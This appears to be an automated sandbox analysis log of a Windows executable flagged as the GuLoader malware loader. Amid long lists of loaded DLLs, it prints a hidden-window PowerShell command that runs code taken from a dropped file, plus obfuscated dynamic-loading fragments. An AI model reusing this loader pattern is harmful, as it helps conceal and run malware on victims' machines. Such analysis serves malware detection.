Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Damascenere.lnk.0.dr LNK file: ..\..\..\..\..\..\..\ProgramData\Polyhistorisk\fagbladsjournalistens.ugi
Source: C:\Users\user\Desktop\Adeleidae.exe File written: C:\Windows\Resources\Nebengeschfter.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Adeleidae.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: tem.Core.pdbt source: powershell.exe, 00000001.00000002.2434845770.0000000008851000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \System.Core.pdbfu source: powershell.exe, 00000001.00000002.2434845770.0000000008851000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2434845770.0000000008851000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.2435373853.0000000009251000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Pennefejdes $Ungdomsoprrenes $Formernes), (Diffusionslinsen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Unaccessibleness = [AppDomain]::CurrentDomain.G
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Baccalaureat)), $Dampsskibsselskabets).DefineDynamicModule($Normaltseende1, $false).DefineType($Nutriture33, $Yanggona, [System.Multic
Suspicious powershell command line found
Source: C:\Users\user\Desktop\Adeleidae.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Labilise=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add';$Freilevs=$Labilise.SubString(6338,3);.$Freilevs($Labilise)"
Source: C:\Users\user\Desktop\Adeleidae.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Labilise=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add';$Freilevs=$Labilise.SubString(6338,3);.$Freilevs($Labilise)" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04CDCA78 push eax; mov dword ptr [esp], edx 1_2_04CDCA8C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04CDD610 push esp; iretd 1_2_04CDD611
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04CDD0B0 pushad ; retf 1_2_04CDD0B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0781E5AC push eax; retf 1_2_0781E5AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_090F03C0 push 8BD68B50h; retf 1_2_090F03C6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_090F4548 push 8BD38B50h; iretd 1_2_090F454E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A8891E pushad ; iretd 6_2_02A8891F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A88C2F pushfd ; iretd 6_2_02A88C30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A88DDF push esp; iretd 6_2_02A88DE0
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
